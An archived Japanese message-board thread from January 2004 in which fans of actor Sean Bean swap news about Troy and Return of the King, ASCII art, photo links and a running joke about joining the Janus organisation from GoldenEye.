トトトロイのプレミアとかどうよ
もうそれだけでいいよ!
(;´Д`)/オイッスオイッス


99 :魅せられた名無しさん:04/01/01 13:18
明けましておめでとう(;´Д`)/オイッス!
初詣ではショーンタンとファンの皆にいいことありますように、と
お祈りしてきたよ。RotKとトロイ、楽しみだね〜。
NTは来年のGWらしい…お楽しみを持ち越しだ。

100 :魅せられた名無しさん:04/01/01 13:23
ショーンタンではないけれど、これもお年玉画像になるかな?
ttp://www.theonering.net/scrapbook/group/1267/view/11644
今年もよろ〜。

101 :魅せられた名無しさん:04/01/01 22:58
木馬を透視してみますた。ズレルダロウケドスマソ
        ∧彡ヘ
        ミ|  ・  \
        ミ|  ,,‘_)
 ____/   |
/ (;´Д`)(,,゚Д゚) | <ゴルァ!! 二人しか入んねぇぞ この木馬! 
||| (∩∩) (∩∩) |   
 ヽ______,,,ノ   
  | | | |  | | | |  
 U U   U  U  


102 :魅せられた名無しさん:04/01/01 23:18
>101GJ!
どっちがショーンタンなんだよう(;´Д`)/オイッスオイッス


103 :魅せられた名無しさん:04/01/01 23:23
>101
カワイイ。GJ!!

(;´Д`) ←個人的にはこっちがショーンタン
(∩∩)  ゴルァなんてしないで困ってるだけ。ラブリー

104 :魅せられた名無しさん:04/01/01 23:27
じゃあ右がアキレスか。

105 :魅せられた名無しさん:04/01/01 23:28
困ってるだけ。可愛い!
そいで脇の下に汗じみ作ると。

106 :魅せられた名無しさん:04/01/02 01:28
マジレスすると、去年マクベス鑑賞時に生でショーンタンの匂いを嗅ぎましたが
欧米の男性にしてはべらぼーに爽やかかつ清潔なグリーン系のシャワージェル&
ボディローションの香りが致しましたです。思わず同じ匂いのバスグッズを買って
帰ってしまいましたよ。
因みに入りの時だったので、終演後の体臭についてはわかりません。

107 :魅せられた名無しさん:04/01/02 02:13
>>106タン
なんと!!ハァハァ、コノシアワセモノサンメェ!!(;´Д`)σ)´∀`*)
ちなみに同じ匂いのバスグッズというのは
どこの商品をお買いあげでしたか?щ(´Д`*щ)ホスィデス・・・

108 :魅せられた名無しさん:04/01/02 02:36
 体 臭 って言われると非常に生々しいがショーンタンだと(;´Д`)ハァハァ
どなたか終演後のレポを!!

109 :魅せられた名無しさん:04/01/02 05:14
   *  *  *
  *         *
 *   Λ_Λ    *
 *   ( ´D` )    *
 *  グリーンケイノニホイ!    *
  *         *
    *  *  *
ズレるんだろうな


110 :魅せられた名無しさん:04/01/02 13:55
ttp://www.theonering.net/perl/newsview/8/1072832592
ショーンタンが来るらしい……(;´Д`)ハァハァ

111 :魅せられた名無しさん:04/01/02 14:49
ショーンタンキター!━━━━━━(゚∀゚)━━━━━━ !!!
見に行けるおまいさんがた、レポヨロシコ!

関係ないが名前にリンク貼られてないキャストがいると思ったら
モーテンそンサンだったよ・゚・(ノД`)・゚・

112 :魅せられた名無しさん:04/01/02 17:02
>>110
ニホンジャナカッタノネ・・・_| ̄|○逝きたいよぅ〜
グリーンケイノニホイ嗅ぎたいよぅ〜(;´Д⊂)

113 :魅せられた名無しさん:04/01/02 18:43
マクベスレポは過去スレにいくつか上がっていたと思われ。
自分が聞いた範囲では「お日様みたいな匂い」「無臭」ですた。

グリーン系のシャワージェル&ボディローションщ(´Д`*щ)ホスィ
ところでショーンタンがLotR関連のお仕事するのって第一部上映の
宣伝以来だよね?ボロミアはやっぱり気に入ってたのかな。嬉スィ。

114 :魅せられた名無しさん:04/01/02 21:42
>>113
SEEのコメンタリとか聞く限りスタッフのみなさんも
3部作通してションタソに出演してもらえたらよかったのに…
みたいな含みがあるような気がしてます。
本人もボロミアは気に入ってるだろうけど、
回りのみんなの働きかけもあってお仕事入ったのでは?

>>110
そのころ私はちょうどニポーンでSEE(FotR)上映をみている予感。
微妙にハァハァ...?

115 :魅せられた名無しさん:04/01/02 22:24
上演後のショーンタンはシャワー後の石鹸&シャンプーのかほりでした。
微妙にほかほか状態で丸刈りアタマがぴよぴよしておりましたぞ。

116 :魅せられた名無しさん:04/01/02 22:37
ほかほかぴよぴよ(;´Д`)ハァハァ

117 :魅せられた名無しさん:04/01/03 00:51
あぁんぴよぴよ・・・(*´Д`)ハァハァ


118 :魅せられた名無しさん:04/01/03 01:48
ぴ……よぴよ……ぴよ……ぴ……よ……(*´Д`)ハァハァ

119 :魅せられた名無しさん:04/01/03 03:52
ぴ・・・ぴよぴよだとう・・・石鹸のかほり・・・(*´Д`)ハァハァ


120 :魅せられた名無しさん:04/01/03 11:06
ひよこショーンタン (ё)ピヨ

121 :魅せられた名無しさん:04/01/03 11:39
セクスィー俳優のセクスィーオーラがハァハァ戦士を直撃した!
コマンド
・たたかう
・(;´Д`)ハァハァする
・(;´Д`)/オイッスする
・にげる

122 :魅せられた名無しさん:04/01/03 13:25
ここのスレ今年も大健在じゃのう

123 :魅せられた名無しさん:04/01/03 14:13
>122
ほんまですな。
ところで、王の帰還が公開されたらこのスレ2周年ですぞ!
祭りだワショーイ!

124 :魅せられた名無しさん:04/01/03 15:08
>121
逃げてつかまる。
          +
      +         +     +
  +
 .     ∧_∧  +.  ∧_∧ ウフフ  +
  アハハハ( ´∀`)    (´∀` )
      (つ  つ     (つ  つ
   .+  ( ヽっノ     ( ヽノ       +
      し(_)      し(_)
____________________________________________________________________

所詮ショーンタンのミリキからは逃れられんのじゃ・・・


125 :魅せられた名無しさん:04/01/03 19:53
皆さん、ハァハァなお年玉置いときますね・・・
|*´Д`)っttp://www.freewebs.com/equilibrium-movie/Suzana045.jpg

126 :魅せられた名無しさん:04/01/03 20:29
>125
む、胸毛もぴよぴよだ…(*´Д`)ハァハァ

127 :魅せられた名無しさん:04/01/03 20:36
>125
何度見てもチクービたってるのが気になります。
もうどうしろと。(*´Д`)ハァハァハァハァハァハァヤバイ人みたいじゃん。


128 :魅せられた名無しさん:04/01/03 21:31
だめだ、やっぱもう辛抱出来ない、リベリオンのDVD買ってしまおう!
年明けからショーンタン貧乏…

129 :魅せられた名無しさん:04/01/04 13:16
RotK観て来ますた。
前スレでボロタン出演シーンの話が出てたけど、書いて
あったのとは違ってたので、ネタバレ見ちゃったと嘆いて
いた人は安心してもいいかと思われ。

130 :魅せられた名無しさん:04/01/04 17:23
正月からイキナリ金目見たくなって借りてきちまった。
ああアレックたんステキ!
ヤヌス入りたい!

131 :魅せられた名無しさん:04/01/04 20:25
漏れもヤヌス入りたい!入隊(隊?)希望!
どこに願書持っていけば入れますか?大卒資格は必要ですか?
専卒資格じゃ駄目ですか?看護師なので、ヤヌス保健室勤務とか駄目ですか?
アレックタンの身体測定(*´Д`*)ハアハア、き、胸囲計りたい(*´Д`*)ハアハア

132 :魅せられた名無しさん:04/01/04 20:37
ハァハァ戦士のヤヌス隊員は、ボンドをためらわず抹殺してしまうので
ストーリーが変わってしまう罠w
とりあえず131タンは胸囲が判明したら報告しる!

133 :魅せられた名無しさん:04/01/04 20:40
保健室ワロタよ。学園物みたいだな。
料理くらいしか取柄のない自分は95連隊のおさんどんに挙手ノ
ハーパーの嫁さんと一緒にみんなの食事を作りますぞオイッス

134 :130:04/01/04 22:17
待て、ヤヌスはコソーリ隊員募集せにゃ。
133タン、お食事はイチゴ味ならなおヨシだ!

135 :魅せられた名無しさん:04/01/04 22:28
〜ヤヌス〜

ヤヌス隊だったらアレックタンは隊長、部下は第95ハァハァ銃連隊員。チョーズンハァハァ。
>133はチキンの丸焼きとワインを用意するべし。

ヤヌス団だったらアレックタンは団長、クラリック服に鉢巻きで337拍子!
団員は(;´Д`)/オイッス(;´Д`)/オイッス(;´Д`)/オイッス

秘密結社ヤヌスだったらアレックタンは社長、入社するには要特殊技能(例:太股が力強い、一流プログラマー等)
>131にはアレックタンからボンド毒殺指令がくだりますた。

136 :魅せられた名無しさん:04/01/05 00:22
ヤヌスの通貨単位はハァハァで給料もそれで支払われると言うのはホントですか?
(*´Д`)ハァハァハァハァハァハァ

137 :魅せられた名無しさん:04/01/05 00:27
おいらの初任給23万アレックタンハアハア………

138 :魅せられた名無しさん:04/01/05 00:31
アレックタンはくれないんですか?

139 :魅せられた名無しさん:04/01/05 00:32
アレックタンが給与明細を手渡してくれるなら安月給でもかまわないよ(;´Д`)ハァハァ

140 :魅せられた名無しさん:04/01/05 00:35
>139
ウルモフタンから明細書進呈カモ
(;´Д`)/オイッス


141 :魅せられた名無しさん:04/01/05 00:48
>140
Σ( ̄□ ̄|||)そんなのイヤン…

142 :魅せられた名無しさん:04/01/05 00:59
140タンがんがれ
ボーナスはアレックタンがくれるかも知れないし!

143 :魅せられた名無しさん:04/01/05 01:01
それよりそもそもハァハァは買い物に使えるのか?
ヤヌスの売店でしか使えなかったら凄い経済の仕組みだが

144 :魅せられた名無しさん:04/01/05 01:19
>136
…お金でなくていい。
ハァハァ戦士たちがハァハァできるようなコトやモノでお願いします。(痛)
アレックタン直々で。

『新しい単位』みたいだな…1ハァハァ…。


145 :魅せられた名無しさん:04/01/05 01:31
アレックタンボスが「良くがんがったな」ってニコーリお給料下さったら
もう死んでもいい…(w



146 :魅せられた名無しさん:04/01/05 01:44
命をかけて組織のために働いた月末、給料袋を覗くとそこには…

「よくがんがりました。来月もよろしく  アレック」

と書かれた便箋が一枚。
年明け早々金欠で死ぬしかない新入りヤヌス隊員達。世の中は厳しい(・∀・)

147 :魅せられた名無しさん:04/01/05 01:47
>146
よく見れ!その便せんは炙り出しだ!
炙ると社長のあられもない姿が浮き出てくるのだ!
それがあなたの初任給1万アレックタンハアハア。

148 :魅せられた名無しさん:04/01/05 01:47
金欠で死ななくてもボンドに爆破されて殺されるけどなw

149 :魅せられた名無しさん:04/01/05 01:49
・゚・(ノД`)・゚・ウワァァァン
炙りすぎて萌えちゃったよー!


150 :魅せられた名無しさん:04/01/05 01:50
でもよく考えたら、旧場の山の中、ヤヌス寮に住み、ヤヌス食堂で
一日三食とアフタヌーンティー付き。
娯楽施設はもちろんヤヌス社屋内にあり、社員は無料。
金を使う場所などない。
だからこそ許される通貨単位、アレックタンハアハアなのだよ、ヤヌスの諸君。

151 :魅せられた名無しさん:04/01/05 01:52
>147
あ、あられもない姿・・・!!!

ってどんなだ?!
見たのか既におまいさんは見たのか!?(*´Д`)ハァハァハァハァハァハァ

152 :魅せられた名無しさん:04/01/05 01:53
>149
萌えたんかい(w それならいいじゃん。燃えたんじゃなくてさ。

153 :魅せられた名無しさん:04/01/05 01:58
いやあの社長は非情そうだぞ。
アフタヌーンティーとか娯楽施設は勿論、
一日三食すらあぶないかもだ。
それでもヤヌスの諸君は喜んで働くだろうがな。

154 :魅せられた名無しさん:04/01/05 02:02
炙り出たのがアレックタン直筆のアカリスの絵だったら…((((;゚Д゚)))ガクガクガクブルブルブル

155 :魅せられた名無しさん:04/01/05 02:13
>154
何を言うか!それに対して「社長ったら…エヘヘ」と(;´Д`)ハァハァできずに
何のためのヤヌスだと思ってるんだ!
いわばあぶり出しの赤リスはテストなのです。踏み絵なのです。
この衝撃を乗り越えてこそ真のヤヌス社員なのです!

156 :魅せられた名無しさん:04/01/05 02:15
待て、社員がアカリスで皆なごんでしまったら
ヤヌスは世界征服ができないぞ!

157 :魅せられた名無しさん:04/01/05 02:16
>154
蘭とどっちがいい?

158 :魅せられた名無しさん:04/01/05 02:20
なごみ系秘密結社ヤヌス。
ゴールデンアイを奪取してアカリス保護を訴えるべく日々奔走。

159 :魅せられた名無しさん:04/01/05 02:32
何故唐突にアレックタン祭り開催…?

160 :魅せられた名無しさん:04/01/05 02:33
ゲゲageてしまいますた
ダムから飛び降りて逝ってきまつ

161 :魅せられた名無しさん:04/01/05 02:47
(;´Д`)

162 :魅せられた名無しさん:04/01/05 03:11
炙り出たのがアレックタンのアカスリの絵だったら…((((;゚Д゚)))ガクガクガクブルブルブル
じゃなくて(;´Д`)ハァハァハァハァハァ


163 :魅せられた名無しさん:04/01/05 03:13
>>157
蘭だと「ん?どう観ても不完全だな…あぶりが足りないのか?」と
>>149タンのようになってしまう隊員続出かとw

164 :魅せられた名無しさん:04/01/05 03:18
娯楽施設か。基地の下〜の方には結構大きなプールが有って
トレーニングを兼ねて時々ボスがバシャバシャしてると考えてよろしいか?


165 :魅せられた名無しさん:04/01/05 03:53
娯楽施設の地下プールは社長専用。
一般兵は上の湖でばた足の特訓しる!

166 :魅せられた名無しさん:04/01/05 04:49
娯楽施設の(社長専用)プールはガラス張り。
社長の泳ぐ姿を見ることが、社員に許された唯一の娯楽。
てめぇの容姿に構っちゃいねぇアレックタン社長は時々海パン一丁、
首にタオルだけひっかけた姿で司令室にやってきて
社員達になごみと(;´Д`)ハアハアを提供するのだす。

167 :魅せられた名無しさん:04/01/05 05:53
もうダメだ我慢できん
頼むからヤヌスに入隊させてくれ!
お茶汲みでもコピーでも何でもするから。
社長の海パンを雑巾絞りしたり
司令室の床についた社長の足跡の上を
ぺたぺた歩きたくてタマラン!
(;´Д`)ハアハア(;´Д`)ハアハア(;´Д`)ハアハア


168 :魅せられた名無しさん:04/01/05 07:56
社長…ってヤヌスは会社組織なのか…?(;´Д`)ハアハア

169 :魅せられた名無しさん:04/01/05 10:55
コソーリ株式上場してたりして、
シャチョサン株の値動きに一喜一憂
「上がったぞ!(喜)」(;´Д`)ハアハア


170 :魅せられた名無しさん:04/01/05 10:57
大丈夫ですか?

171 :魅せられた名無しさん:04/01/05 11:18
微妙

172 :魅せられた名無しさん:04/01/05 11:18
もうダメです
萌え過ぎて(;´Д`)ハァハァ

173 :魅せられた名無しさん:04/01/05 11:36
>168
秘密結「社」なので社長なり。

174 :魅せられた名無しさん:04/01/05 11:39
>170タン
改めてきかれるとてれちゃうね
勿論ダメだ…

175 :魅せられた名無しさん:04/01/05 11:55
このスレの場合ハァハァ戦士にあらずんば人にあらずだからな・・・。

176 :魅せられた名無しさん:04/01/05 13:44
最近、これといった話題がなかったからなぁ。
トロイ公開後なら(;´Д`)/オイッスな話題が沢山出てくれる…ことを期待。

それまで(;´Д`)ハァハァ

177 :魅せられた名無しさん:04/01/05 14:28
来週のN.Yのイベントがあるじゃないか!!!
ニューヨークに逝きたいぞーーーーー!!
シャシンヤ キジガ マチドオシイYO!!(;´Д`)ハァハァ

43 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)